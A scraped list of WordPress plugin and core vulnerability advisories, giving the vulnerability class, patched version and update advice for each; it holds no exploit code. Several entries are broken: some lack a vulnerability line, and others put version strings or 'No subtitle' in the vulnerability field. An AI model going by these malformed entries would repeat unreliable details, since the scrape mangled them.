Recommended Action: Update to version 2.1, or a newer patched version

Plugin: GdeSlon Affiliate Shop

Vulnerability: Open Redirect
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 7.3.5
Recommended Action: Update to version 7.3.5, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 13.2.9
Recommended Action: Update to version 13.2.9, or a newer patched version

Plugin: Popup Manager

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: SQL Injection
Patched Version: 2.0.16
Recommended Action: Update to version 2.0.16, or a newer patched version

Plugin: WP Affiliate Platform

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.3.9
Recommended Action: Update to version 6.3.9, or a newer patched version

Plugin: WH Testimonials

Plugin: Custom Post Type List Shortcode

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via pointsf
Patched Version: 1.3.2.1
Recommended Action: Update to version 1.3.2.1, or a newer patched version

Plugin: WP All Export Pro

Vulnerability: Cross-Site Request Forgery to Remote Code Execution
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: SQL Injection
Patched Version: 3.9.1
Recommended Action: Update to version 3.9.1, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: WordPress WP-Advanced-Search

Vulnerability: Unauthenticated Database Export
Patched Version: 3.3.4
Recommended Action: Update to version 3.3.4, or a newer patched version

Plugin: Comment Extra Fields

Plugin: WP SVG Images

Vulnerability: Authenticated (author+) Stored Cross-Site Scripting via SVG
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: WP-TopBar

Plugin: Advanced iFrame

Vulnerability: No subtitle
Patched Version: 2022
Recommended Action: Update to version 2022, or a newer patched version

Plugin: ARI Stream Quiz – WordPress Quizzes Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: iThemes Builder Style Manager

Vulnerability: Cross-Site Scripting
Patched Version: 0.7.7
Recommended Action: Update to version 0.7.7, or a newer patched version

Plugin: S3Bubble Cloud Video with Adverts and Analytics

Vulnerability: Arbitrary File Download
Patched Version: 4.8
Recommended Action: Update to version 4.8, or a newer patched version

Plugin: Carousel CK

Plugin: Invite Anyone

Vulnerability: PHP Object Injection
Patched Version: 1.3.19
Recommended Action: Update to version 1.3.19, or a newer patched version

Plugin: TS Poll – Survey, Versus Poll, Image Poll, Video Poll

Vulnerability: Missing Authorization
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘deleteCacheToolbar’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: WP Custom Post Template

Plugin: User Role Editor

Vulnerability: Authenticated Privilege Escalation
Patched Version: 4.25
Recommended Action: Update to version 4.25, or a newer patched version

Plugin: Logo Slider and Showcase

Vulnerability: Settings Update
Patched Version: 1.3.37
Recommended Action: Update to version 1.3.37, or a newer patched version

Plugin: YOP Poll

Vulnerability: Author+ Stored Cross-Site Scripting
Patched Version: 6.3.5
Recommended Action: Update to version 6.3.5, or a newer patched version

Plugin: Plezi

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Tooltipy (tooltips for WP)

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.1
Recommended Action: Update to version 5.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Ultimate Addons for Beaver Builder – Lite

Vulnerability: Missing Authorization
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery to Authentication Takeover
Patched Version: 3.7.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.4, 3.8.4, 3.9.2

Plugin: BulletProof Security

Vulnerability: SQL Injection
Patched Version: .51.1
Recommended Action: Update to version .51.1, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Stored Cross-Site Scripting via Uploaded SVG
Patched Version: 1.5.79
Recommended Action: Update to version 1.5.79, or a newer patched version

Plugin: WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting

Vulnerability: Authenticated (Accounting manager+) SQL Injection
Patched Version: 1.12.9
Recommended Action: Update to version 1.12.9, or a newer patched version

Plugin: Image Gallery with Slideshow Plugin

Plugin: Pro Mime Types – Manage file media types

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: CF7 Skins for Contact Form 7

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated (Admin+) PHAR Deserialization
Patched Version: 0.9.75
Recommended Action: Update to version 0.9.75, or a newer patched version

Plugin: Laposta Signup Basic

Vulnerability: Missing Authorization
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Bootstrap Shortcodes

Plugin: Events Addon for Elementor

Vulnerability: Missing Authorization
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: wordpress vertical image slider plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Core: WordPress

Vulnerability: 5.8
Patched Version: 5.4.7
Recommended Action: Update to one of the following versions, or a newer patched version: 5.4.7, 5.5.6, 5.6.5, 5.7.3, 5.8.1

Plugin: Widget Control Powered By Everyblock

Plugin: Broken Link Manager

Vulnerability: SQL Injection
Patched Version: 0.5.0
Recommended Action: Update to version 0.5.0, or a newer patched version

Plugin: Announcement & Notification Banner – Bulletin

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Car Seller – Auto Classifieds Script

Vulnerability: Auto Classifieds Script <= 2.1.0
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JobSearch WP Job Board

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Quick Paypal Payments

Vulnerability: Missing Authorization
Patched Version: 5.7.26
Recommended Action: Update to version 5.7.26, or a newer patched version

Plugin: BuddyPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 11.3.2
Recommended Action: Update to version 11.3.2, or a newer patched version

Plugin: FastDup – Fastest WordPress Migration & Duplicator

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: Shortcode Factory

Vulnerability: Local File Inclusion
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: Instant CSS

Vulnerability: Missing Authorization via AJAX Actions
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Missing Authorization
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: dTabs

Plugin: PPOM – Product Addons & Custom Fields for WooCommerce

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 18.4
Recommended Action: Update to version 18.4, or a newer patched version

Plugin: Latest Posts by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.3
Recommended Action: Update to version 0.3, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Arbitrary Backup Creation and Download
Patched Version: 0.5.10
Recommended Action: Update to version 0.5.10, or a newer patched version

Plugin: FOX – Currency Switcher Professional for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.7.1
Recommended Action: Update to version 1.3.7.1, or a newer patched version

Plugin: Corner Ad

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.54
Recommended Action: Update to version 1.0.54, or a newer patched version

Plugin: Export any WordPress data to XML/CSV

Vulnerability: Authenticated SQL Injection
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Backup and Staging by WP Time Capsule

Vulnerability: Authentication Bypass
Patched Version: 1.21.16
Recommended Action: Update to version 1.21.16, or a newer patched version

Plugin: Crony Cronjob Manager

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 0.4.7
Recommended Action: Update to version 0.4.7, or a newer patched version

Plugin: Launchpad – Coming Soon & Maintenance Mode Plugin

Plugin: Multiplayer Games

Plugin: Protected Posts Logout Button

Vulnerability: Missing Authorization on pplb_options_save
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: SQL Injection
Patched Version: 0.60
Recommended Action: Update to version 0.60, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: 5.0.6
Patched Version: 5.0.7
Recommended Action: Update to version 5.0.7, or a newer patched version

Plugin: Paytm – Donation Plugin

Plugin: Simple Banner – Easily add multiple Banners/Bars/Notifications/Announcements to the top or bottom of your website

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.10.4
Recommended Action: Update to version 2.10.4, or a newer patched version

Plugin: Client Portal – Private user pages and login

Vulnerability: Cross-Site Request Forgery via cp_create_private_pages_for_all_users function
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy)

Vulnerability: Authorization Bypass
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: Login Configurator

Plugin: LWS Cleaner

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: wpMandrill

Vulnerability: Missing Authorization via getAjaxStats
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Constant Contact Forms

Vulnerability: Missing Authorization via constant_contact_privacy_ajax_handler
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.14.0.3
Recommended Action: Update to version 1.14.0.3, or a newer patched version

Plugin: flickrRSS

Vulnerability: Cross-Site Scripting via flickrRSS_tags
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gift Certificate Creator

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Lead-Octopus-Power

Vulnerability: SQL Injection
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Registrations for the Events Calendar – Event Registration Plugin

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.7.6
Recommended Action: Update to version 2.7.6, or a newer patched version

Plugin: Recommend to a friend

Plugin: php-shell

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Remote Code Execution
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Dropdown and scrollable Text

Vulnerability: Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Cloudflare

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.21
Recommended Action: Update to version 1.3.21, or a newer patched version

Plugin: 10WebSocial

Vulnerability: Cross-site scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: WP No External Links

Plugin: New User Approve

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Stock Ticker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scritping
Patched Version: 3.23.5
Recommended Action: Update to version 3.23.5, or a newer patched version

Plugin: Download Manager

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.2.35
Recommended Action: Update to version 3.2.35, or a newer patched version

Plugin: MZ Mindbody API

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: Stock Sync for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Sales Report for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 3.5.7.7
Recommended Action: Update to version 3.5.7.7, or a newer patched version

Plugin: WooCommerce Checkout & Funnel Builder by CartFlows – Create High Converting Stores For WooCommerce

Vulnerability: Insecure Direct Object Reference to Arbitrary Post Deletion
Patched Version: 1.11.12
Recommended Action: Update to version 1.11.12, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Unauthenticated iFrame Injection via Paragraph and Short Answer
Patched Version: 8.0.5
Recommended Action: Update to version 8.0.5, or a newer patched version

Plugin: VDZ Google Analytics or Google Tag Manager / GTM

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: HUSKY – Products Filter Professional for WooCommerce

Vulnerability: Unauthenticated SQL Injection via search terms
Patched Version: 1.3.4.3
Recommended Action: Update to version 1.3.4.3, or a newer patched version

Plugin: OMGF | GDPR/DSGVO Compliant, Faster Google Fonts. Easy.

Vulnerability: Unauthenticated Path Traversal in REST API
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: VK Blocks

Vulnerability: Authenticated(Contributor+) Settings Update
Patched Version: 1.58.0.0
Recommended Action: Update to version 1.58.0.0, or a newer patched version

Plugin: BuddyPress Customer.io Analytics Integration

Plugin: Photo Gallery by Supsystic

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: YITH WooCommerce Multi Vendor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.1
Recommended Action: Update to version 3.8.1, or a newer patched version

Plugin: Quick Contact Form

Vulnerability: Cross-Site Request Forgery to Sensitive Information Disclosure
Patched Version: 8.0.4
Recommended Action: Update to version 8.0.4, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Authenticated(Administrator+) Blind Server Side Request Forgery via check_url
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: WP Home Page Menu

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: WooCommerce Pre-Orders

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Fantastic Content Protector Free

Vulnerability: Missing Authorization via update_setting_fantastic_content_protector
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: neuvoo-jobroll

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.7.9
Recommended Action: Update to version 3.7.9, or a newer patched version

Plugin: YITH WooCommerce Bulk Product Editing

Plugin: WPBakery Page Builder for WordPress

Vulnerability: Multiple Cross-Site Scripting Issues
Patched Version: 4.7.4
Recommended Action: Update to version 4.7.4, or a newer patched version

Plugin: Multiple Shipping Address Woocommerce

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Democracy Poll

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.4
Recommended Action: Update to version 5.4, or a newer patched version

Plugin: Blog Filter – Advanced Post Filtering with Categories Or Tags, Post Portfolio Gallery, Blog Design Template, Blog Post Layout

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: PDF Invoices & Packing Slips for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 2.15
Recommended Action: Update to version 2.15, or a newer patched version

Plugin: Orbit Fox by ThemeIsle

Vulnerability: Authenticated (Contributor+) Stored Cross Site Scripting
Patched Version: 2.10.3
Recommended Action: Update to version 2.10.3, or a newer patched version

Plugin: Gallery Bank – WordPress Photo Gallery Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.70
Recommended Action: Update to version 3.0.70, or a newer patched version

Plugin: WP Better Emails

Plugin: WP Job Manager

Vulnerability: PHP Object Injection via PHAR Deserialization
Patched Version: 1.31.3
Recommended Action: Update to version 1.31.3, or a newer patched version

Plugin: WP Prayer

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Astra Pro Addon

Vulnerability: Authenticated(Contributor+) Remote Code Execution via Metabox
Patched Version: 4.3.2
Recommended Action: Update to version 4.3.2, or a newer patched version

Plugin: Sunny Search

Plugin: Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission – WP User Frontend

Vulnerability: SQL Injection & Reflected Cross-Site Scripting
Patched Version: 3.5.26
Recommended Action: Update to version 3.5.26, or a newer patched version

Plugin: WP Accessibility Helper (WAH)

Vulnerability: Missing Authorization via AJAX action
Patched Version: 0.6.2.5
Recommended Action: Update to version 0.6.2.5, or a newer patched version

Plugin: Translate WordPress with GTranslate

Vulnerability: Open Redirect
Patched Version: 2.8.11
Recommended Action: Update to version 2.8.11, or a newer patched version

Plugin: WordPress Social Login

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quotes Collection

Plugin: Hide admin notices – Admin Notification Center

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: FluentSMTP – WP SMTP Plugin with Amazon SES, SendGrid, MailGun, Postmark, Google and Any SMTP Provider

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: IWS – Geo Form Fields

Vulnerability: Geo Form Fields <= 1.0
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Dexs PM System

Plugin: swipe-hq-checkout-for-eshop

Plugin: hiWeb Migration Simple

Plugin: WordPress File Upload

Vulnerability: Authenticated (Contributor+) Path Traversal
Patched Version: 4.16.3
Recommended Action: Update to version 4.16.3, or a newer patched version

Plugin: Comment Link Remove and Other Comment Tools

Vulnerability: Arbitrary Comment Deletion via Cross-Site Request Forgery
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: WP Multi Store Locator

Plugin: Kangu para WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.10
Recommended Action: Update to version 2.2.10, or a newer patched version

Plugin: Top 25 Social Icons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated Arbitrary File Upload leading to Remote Code Execution
Patched Version: 5.16.5
Recommended Action: Update to version 5.16.5, or a newer patched version

Plugin: Portable phpMyAdmin

Plugin: Checkout for PayPal

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: Metronet Tag Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: PS PHPCaptcha WP

Vulnerability: Authenticated Denial of Service
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: WP Contact Slider – Slide Out Contact Form for WordPress to display Contact Form 7, Gravity Forms, WP Forms, Ninja Forms, plain text/HTML & other shortcodes

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.4.8
Recommended Action: Update to version 2.4.8, or a newer patched version

Plugin: Multiple Domain

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: WP Human Resource Management

Vulnerability: Authorization Bypass
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: OSMapper

Vulnerability: Unauthenticated Arbitrary Post Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Abstracts

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: Font – official webfonts plugin of Fonts For Web. NO CODING! Just click & change font size, color and font face visually!

Vulnerability: Path Traversal
Patched Version: 7.5.1
Recommended Action: Update to version 7.5.1, or a newer patched version

Plugin: Active Directory Integration

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Authenticated SQL Injection
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Barcode Scanner and Inventory manager. POS (Point of Sale) – scan barcodes & create orders with barcode reader.

Vulnerability: Unauthenticated SQL Injection via userToken
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Privilege Escalation via Unprotected REST API Endpoint
Patched Version: 1.0.41
Recommended Action: Update to version 1.0.41, or a newer patched version

Plugin: User Meta – User Profile Builder and User management plugin

Vulnerability: Path Traversal
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: Video Conferencing with Zoom

Vulnerability: Sensitive Information Exposure
Patched Version: 4.2.2
Recommended Action: Update to version 4.2.2, or a newer patched version

Plugin: WP-PostRatings

Vulnerability: Race Condition
Patched Version: 1.90
Recommended Action: Update to version 1.90, or a newer patched version

Plugin: Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress

Vulnerability: Authenticated (Contributor+) SQL Injection via cntctfrmtdb_department
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Show All Comments

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.0.1
Recommended Action: Update to version 7.0.1, or a newer patched version

Plugin: Testimonials by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.1.9
Recommended Action: Update to version 0.1.9, or a newer patched version

Plugin: Image Photo Gallery Final Tiles Grid

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: WP Affiliate Links

Plugin: Product GTIN (EAN, UPC, ISBN) for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Strong Testimonials

Vulnerability: Authorization Bypass
Patched Version: 2.51.3
Recommended Action: Update to version 2.51.3, or a newer patched version

Plugin: CaPa Protect

Plugin: HC Custom WP-Admin URL

Vulnerability: Missing Authorization to Login URL Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YaySMTP – WP SMTP Plugin with Full Email Log & 15+ SMTP Services

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Header Enhancement

Vulnerability: Missing Authorization
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Nofollow Links

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: Photo Gallery, Images, Slider in Rbs Image Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.12
Recommended Action: Update to version 3.2.12, or a newer patched version

Plugin: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC)

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.10
Recommended Action: Update to version 2.6.10, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated Local File Inclusion
Patched Version: 1.5.25
Recommended Action: Update to version 1.5.25, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.26
Recommended Action: Update to version 3.3.26, or a newer patched version

Plugin: Comment Reply Email

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Gallery – Video Gallery and YouTube Gallery

Vulnerability: Video Gallery and YouTube Gallery <= 1.7.01
Patched Version: 1.7.02
Recommended Action: Update to version 1.7.02, or a newer patched version

Plugin: SmartCrawl WordPress SEO checker, SEO analyzer, SEO optimizer

Vulnerability: Unauthenticated Password Protected Post Disclosure
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 13.1
Recommended Action: Update to version 13.1, or a newer patched version

Plugin: Jazz Popups

Vulnerability: Reflected Cross-Site Scripting via ‘wpjazzpopup_switchonoff’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Student Result or Employee Database

Vulnerability: Authentication Bypass
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Brizy – Page Builder

Vulnerability: Page Builder < 1.0.114
Patched Version: 1.0.114
Recommended Action: Update to version 1.0.114, or a newer patched version

Plugin: Event Monster – Event Management, Tickets Booking, Upcoming Event

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Cross-Site Scripting
Patched Version: 4.9.4
Recommended Action: Update to version 4.9.4, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Multiple Cross-Site Scripting vulnerabilities
Patched Version: 2.0.28
Recommended Action: Update to version 2.0.28, or a newer patched version

Plugin: Zephyr Project Manager

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Shortcode Injection
Patched Version: 1.3.84
Recommended Action: Update to version 1.3.84, or a newer patched version

Plugin: User Submitted Posts – Enable Users to Submit Posts from the Front End

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 20230914
Recommended Action: Update to version 20230914, or a newer patched version

Plugin: wSecure Lite

Vulnerability: Remote Code Execution
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Full Path Disclosure
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Select All Categories and Taxonomies, Change Checkbox to Radio Buttons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: CP Contact Form with PayPal

Vulnerability: SQL Injection
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

